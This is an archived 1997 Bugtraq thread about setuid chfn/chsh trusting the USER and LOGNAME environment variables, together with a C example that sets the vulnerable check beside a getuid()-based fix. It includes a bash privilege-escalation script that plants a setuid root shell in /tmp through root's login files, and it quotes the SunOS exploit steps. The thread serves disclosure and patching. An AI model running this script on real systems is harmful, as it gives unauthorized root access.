Bugtraq mailing list archives
Interim solution for ps
From: blind () SEDATED NET (Trevor Linton)
Date: Mon, 19 May 1997 07:19:31 +0000
Here's a rough script to get root; this is more of an algorithm than a working script, but in "theory" it will work. This will work if chsh and chfn are +s'ed, and if they use getenv.

------ CUT ------
#!/bin/bash
#
# Very basic, I need a way to set root shell to /tmp/.tmp
# chfn on some systems will set the directory, on some it won't.
# depends.. :\
#
# patch:
# 1) -s both chfn and chsh
# 2) edit the source code for chfn and chsh and remove
#    getenv("LOGNAME") and or getenv("USER") and replace
#    with getuid(); ..
#
mkdir -f /tmp/.tmp
export USER="root"
export LOGNAME="root"
echo Set the HOME DIRECTORY RIGHT NOW TO /tmp/.tmp
chfn
echo "Set the SHELL TO /bin/bash!"
chsh
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.profile
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.profile
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.profile
echo "Exploit set, wait a day then log back on and execute"
echo "/tmp/.exp to get root, /tmp/.exp is a sh shell when"
echo "root logs in it'll be +s'ed"
-----------------
blind - blind () root hax0r org
support () hax0r org
Swingin' Utters. a juvenile product of the working class.

On Mon, 19 May 1997, Nick Simicich wrote:
Of course, if Bash was changed, I could change them from perl, or a C program, and then run bash out of my C program or Perl. You were right the first time - don't trust your environment unless you control it.

On Sun, 18 May 1997, Trevor Linton wrote:

Date: Sun, 18 May 1997 13:36:00 +0000
From: Trevor Linton <blind () SEDATED NET>
To: best-of-security () suburbia net
Subject: BoS: SunOS exploit.
Resent-Date: Tue, 20 May 1997 09:21:05 +1000 (EST)
Resent-From: best-of-security () suburbia net

On SunOS, if you execute a clean bash shell, then type export USER="root", then USER=$LOGNAME, then execute chsh root or chfn root, you can change the root information. Why? Well, first off, chsh and chfn are +s'ed. This is a bad idea in the first place. Second off, chsh and chfn use the function getenv("USER"); most programs bother to use this instead of geteuid(). getenv("USER") reports that the user is root (while geteuid() would report the real userid), and then since chsh and/or chfn is +s'ed it'll change root's shell user information, or ANYONE on the system's information! On the SunOS system I have, I've been able to lock out ANYONE's shell using this exploit, locking out root's shell as well as changing anyone's NAME info in /etc/passwd etc.. etc.. Any program that uses getenv("USER") is vulnerable (that's in bash). tcsh and some other shells I remember don't allow USER and LOGNAME modifying. :\

Anyways, here's a rough patch:
1) -s the programs that use getenv(), such as chsh and chfn
2) remove getenv() and replace it with geteuid();
3) possibly get the programmers of bash to fix it so USER and LOGNAME can't be modified unless it's super-user.

I'm sure there's a way to get root from this exploit butta.. :) oh well.

Trevor Linton (blind) - blind () sedated net
support () hax0r org
Swingin' Utters. a juvenile product of the working class.
"People who are having trouble communicating should just shuttup"

Of course my password is the same as my pet's name.
My macaw's name was Q47pY!3, but I change it every 90 days.
Nick Simicich mailto:njs () scifi squawk com or (last choice) mailto:njs () us ibm com
http://scifi.squawk.com/njs.html -- Stop by and Light Up The World!
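The thread's point is that a setuid program must not learn who invoked it from USER or LOGNAME, because the unprivileged caller sets those before the exec. The following C example is added here and is not code from the thread or from any chfn/chsh implementation: it puts the environment-based identity check the posts describe beside a check keyed on the real uid. Note that in a setuid binary it is getuid() (the real uid) that identifies the invoking user; geteuid() returns the effective uid, which is the file owner. The policy ("root may edit anyone, others only themselves"), the function names and the passwd-name lookup via getpwuid() are assumptions made for the example.

```c
/* Identity checks for a hypothetical setuid account-editing tool:
   the vulnerable pattern (trust getenv("USER")) beside the hardened
   one (ask the kernel for the real uid, map it through getpwuid). */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* VULNERABLE: the caller's name comes from the environment, which the
   unprivileged caller fully controls before exec'ing a setuid binary. */
const char *caller_name_from_env(void)
{
    const char *name = getenv("USER");
    if (name == NULL)
        name = getenv("LOGNAME");
    return name;            /* NULL when neither variable is set */
}

/* HARDENED: the caller's name is derived from the real uid, which the
   kernel sets and which a setuid exec does not change. Returns 1 and
   fills buf on success, 0 if the uid has no passwd entry. */
int caller_name_from_uid(char *buf, size_t len)
{
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL)
        return 0;
    snprintf(buf, len, "%s", pw->pw_name);
    return 1;
}

/* Assumed policy: root may edit any account, everyone else only their
   own. Decided the way the thread says chfn/chsh did it: by the name
   string, so USER=root hands root's rights to any caller. */
int may_edit_account_env(const char *target)
{
    const char *caller = caller_name_from_env();
    if (caller == NULL)
        return 0;
    return strcmp(caller, "root") == 0 || strcmp(caller, target) == 0;
}

/* Same policy keyed on getuid(): nothing in the environment can change
   the answer. */
int may_edit_account_uid(const char *target)
{
    char caller[256];
    if (getuid() == 0)
        return 1;
    if (!caller_name_from_uid(caller, sizeof caller))
        return 0;           /* unknown uid: deny rather than guess */
    return strcmp(caller, target) == 0;
}

int main(void)
{
    /* Constructed scenario: an ordinary user exported USER=root
       (the thread's trick) before running the tool. */
    setenv("USER", "root", 1);
    setenv("LOGNAME", "root", 1);
    printf("env-based check lets caller edit 'root': %d\n",
           may_edit_account_env("root"));
    printf("uid-based check lets caller edit 'root': %d\n",
           may_edit_account_uid("root"));
    return 0;
}
```

Run as a non-root user, the first line prints 1 and the second 0: the environment-based check is fooled by the exported variable, the uid-based check is not. Denying when getpwuid() finds no entry is the safe default for a privileged tool; falling back to an environment variable there would reopen the hole.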
Current thread:
- Interim solution for ps Trevor Linton (May 19)